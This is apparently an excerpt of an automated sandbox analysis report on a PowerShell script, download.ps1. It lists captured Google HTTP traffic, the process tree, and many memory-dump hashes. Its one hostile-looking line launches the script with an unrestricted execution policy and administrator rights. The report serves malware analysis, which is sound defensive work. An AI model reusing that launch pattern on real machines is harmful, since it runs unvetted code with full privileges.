Set-Cookie: AEC=AZ6Zc-XxSARDRInUcQJV4FqZp2DkxBP5S7p_XEqr6sKvZmuyCordd-gfWQ; expires=Tue, 24-Jun-2025 09:02:02 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Set-Cookie: NID=520=SnuEBjnpUFMpD1gHJb6dCEc-8au49n1cfSYdpCxEEmowJ8kPkwuzhWZu0B3DybtuBYl4SmRmvHpf7x672oC8RFavN983R1f8p2FaLW1-iK8CmGK0QsJ4Pzooxx8MPA1g5l8FXOaMvH49BHGS5MQpDKIOszce-LUV2UX_Jn9FZECDDm3OGoSG7IRTurIS-kOZGkgnWF1U; expires=Fri, 27-Jun-2025 09:02:02 GMT; path=/; domain=.google.com; HttpOnly
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
                                                                                                                Data Ascii: ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);background-position:0 0;display:block;font-size:0;height:17px;width:16px}.gbto #gbi5{background-position:-6px -22px}.gbn .gbmt,.gbn .g
                                                                                                                Dec 26, 2024 10:02:02.837733030 CET1236INData Raw: 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74
                                                                                                                Data Ascii: .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid #bebebe;-moz-box-shadow:0 2px 4px rgba(0,0,0,.12);-o-box-shadow:0 2p


Target ID: 0
Start time: 04:01:53
Start date: 26/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 1
Start time: 04:01:53
Start date: 26/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                                                  • Opcode Fuzzy Hash: a8ce0af5413e8fd83421e6c788ab71ad12062a4e9f23e7a2607f2eaf8ac6b9ed
                                                                                                                  • Instruction Fuzzy Hash: 6231FE70A1868E8EFBB4AF14CDAABF972D4FF42319F40453AD90DC6092CA7C6945DA11
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e1eb0f600ab69d582f7146521644943f7a53629cf70089fcbb4f7278ca02e24e
                                                                                                                  • Instruction ID: 9e40b14e8de2772f55e125ca074e54adfc15b549d89c1b8abd17c1d85127642c
                                                                                                                  • Opcode Fuzzy Hash: e1eb0f600ab69d582f7146521644943f7a53629cf70089fcbb4f7278ca02e24e
                                                                                                                  • Instruction Fuzzy Hash: A411D37271C7054FD75CDE1CD8D146577E1EB99360B50093EE0CAC36A6EE26F8428B42
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 643aa879a4fb92eb3df55465fe6e5ed589bf22b639f6b071dbcc2ff82345d9bf
                                                                                                                  • Instruction ID: fb7e137b78c83b3d1dc6f2c85adb4bb9d72613bf1f86f041c7a104eaa1d040b2
                                                                                                                  • Opcode Fuzzy Hash: 643aa879a4fb92eb3df55465fe6e5ed589bf22b639f6b071dbcc2ff82345d9bf
                                                                                                                  • Instruction Fuzzy Hash: 5C01677121CB0C4FD744EF4CE451AA5B7E0FB99364F10056EE58AC3691DA36E881CB45
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6e2de2f32daf0fd5ab6cb6fad72adb765b76f53c4a94bf305dc6ac16ff9e7b8b
                                                                                                                  • Instruction ID: 153eefe8dd41104444a768fd0b1ada2ca64eaa38816bba32f3c53b808992e8c4
                                                                                                                  • Opcode Fuzzy Hash: 6e2de2f32daf0fd5ab6cb6fad72adb765b76f53c4a94bf305dc6ac16ff9e7b8b
                                                                                                                  • Instruction Fuzzy Hash: CDF0303275C6048FDB5CAA5CF8529B573E1EB99324B10016EE48BC3696E927F8428686
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2275257019.00007FFD34B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34B60000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34b60000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0613a71783e4163598efa825b56d43b13381558be595072d7b75f22bb9f8e5a4
                                                                                                                  • Instruction ID: 6a77273120d108584b165f1983af31c219be8553523be2af5d74e176bc6a3faa
                                                                                                                  • Opcode Fuzzy Hash: 0613a71783e4163598efa825b56d43b13381558be595072d7b75f22bb9f8e5a4
                                                                                                                  • Instruction Fuzzy Hash: 68F0BE32B0D5049FDB68EB4CE4928A873E0FF5633071400B6E24CC75A3DA2AEC05CB81
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6d2fcf5b06d3b6e54d15b60e9986cdd6684be8b1207f5f7460859e4002a9ff5b
                                                                                                                  • Instruction ID: 7ab22c226f1d85a464ec2c3bda4951fa218a1983cc0d7d4a47b8fc267603962f
                                                                                                                  • Opcode Fuzzy Hash: 6d2fcf5b06d3b6e54d15b60e9986cdd6684be8b1207f5f7460859e4002a9ff5b
                                                                                                                  • Instruction Fuzzy Hash: 28F0BB3584C6894FDB16DF2888595D9BFE0FF17310B0502ABE458C70F2DB649955C7C2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: L_^$L_^$L_^
                                                                                                                  • API String ID: 0-639022185
                                                                                                                  • Opcode ID: 914fb43a5255ce9bc1fd59a2850fad16592a15d994f351f5d65a6491f7b2c8c2
                                                                                                                  • Instruction ID: 13567d5d483fd986b5cb76b3dbccc1b995ff6ec2ebb46edf7553c1c067571f51
                                                                                                                  • Opcode Fuzzy Hash: 914fb43a5255ce9bc1fd59a2850fad16592a15d994f351f5d65a6491f7b2c8c2
                                                                                                                  • Instruction Fuzzy Hash: 2A02F671A08A498FDB95DF5CC4A5AED7BE1FF6A310F14017AD009D7292DE78A842CBC1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270724899.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34980000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 241d289eeccbbb9108a2baa4de676ccb8f207d2b617932db7ce0e378424b52d8
                                                                                                                  • Instruction ID: 5179d942415188420711aefae0efd0ed6ca6db107d5c8a82e64d7b58b291d923
                                                                                                                  • Opcode Fuzzy Hash: 241d289eeccbbb9108a2baa4de676ccb8f207d2b617932db7ce0e378424b52d8
                                                                                                                  • Instruction Fuzzy Hash: 1202E621B0EBC94FDB969A3C88A59643BE1EF6731071901FFC149CB1A7D919DC46C391
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270724899.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34980000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d01d3c0fabd16d5ce03a45f87788e8490f62bf0a99e19f29598755a081c54c63
                                                                                                                  • Instruction ID: dc4f573e0fd2ba038d9d205b570f509ff3f01e81b61517860788917b9420bc84
                                                                                                                  • Opcode Fuzzy Hash: d01d3c0fabd16d5ce03a45f87788e8490f62bf0a99e19f29598755a081c54c63
                                                                                                                  • Instruction Fuzzy Hash: EC022721A0DB854FDB86DB3CC8A59643BE1EF57310B1901EEC589CF197D929EC46C3A1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270724899.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34980000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 80ddb929e75e3640002bfb228975dc8847d2e77f73d052d3c736f7d5ccf89cb9
                                                                                                                  • Instruction ID: f7ffd8251638acffe59de0372f5af3d466ecdb4eab3fedf4ee072883170d88db
                                                                                                                  • Opcode Fuzzy Hash: 80ddb929e75e3640002bfb228975dc8847d2e77f73d052d3c736f7d5ccf89cb9
                                                                                                                  • Instruction Fuzzy Hash: 36E13621A0EBC51FEB9A973C88A59613FE1EF5B31071901EEC589CB0A7D919EC46C391
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a635815d6f8ae67203642db8ad0a240569e98b01207fcde5116bf26a4c6115bf
                                                                                                                  • Instruction ID: 91a793f2027eed03ac38b7162d43180ee83a9a9374e84625c3c35f4885dfc77b
                                                                                                                  • Opcode Fuzzy Hash: a635815d6f8ae67203642db8ad0a240569e98b01207fcde5116bf26a4c6115bf
                                                                                                                  • Instruction Fuzzy Hash: ED71794BB0EBD21EF292576C68F70E53BD0DE532B970910B7C685CA1539D4E180BA6E3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f564802db2bfeaa9428df61588b38d8a2da7d464d2870ed2c3c8243204c73074
                                                                                                                  • Instruction ID: da94c211b6f43dec584fdf4580c851f08319e9bc52469f7e8bed54abe9c916b5
                                                                                                                  • Opcode Fuzzy Hash: f564802db2bfeaa9428df61588b38d8a2da7d464d2870ed2c3c8243204c73074
                                                                                                                  • Instruction Fuzzy Hash: 07518047B0DB821EF712526C68BA0EA3BD4EF9336570D11B3CA85CA193AD4D1807A2D7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9c237966404684ff235e6e99782c3469e89489d787e45c54fff20fef98bf2230
                                                                                                                  • Instruction ID: 72637170c06bccbdb94aaed052872aa4e78d7af113fee45bff38d6141427a657
                                                                                                                  • Opcode Fuzzy Hash: 9c237966404684ff235e6e99782c3469e89489d787e45c54fff20fef98bf2230
                                                                                                                  • Instruction Fuzzy Hash: E6519256B0D6D66FE612A7BCA4F20E93FA0DF1332470D01B7C284CA493ED9D6407A292
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0e73629c1b61a9808072def581ed0421f6d6b5e5bd8e17724499f6a26fbe6731
                                                                                                                  • Instruction ID: 789304a5e0d9800ee1d93abe54369bbf810f1ab151a87e5f105a93f4eb405367
                                                                                                                  • Opcode Fuzzy Hash: 0e73629c1b61a9808072def581ed0421f6d6b5e5bd8e17724499f6a26fbe6731
                                                                                                                  • Instruction Fuzzy Hash: 6F31564BB0DB921EF666522C18FB0EA3BD4DF532B574921B3C745C61936D4E180B51D2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1fa38ee433dabf2b4fccdbadaad80eb8e960d56677b52e96096d4010042e7916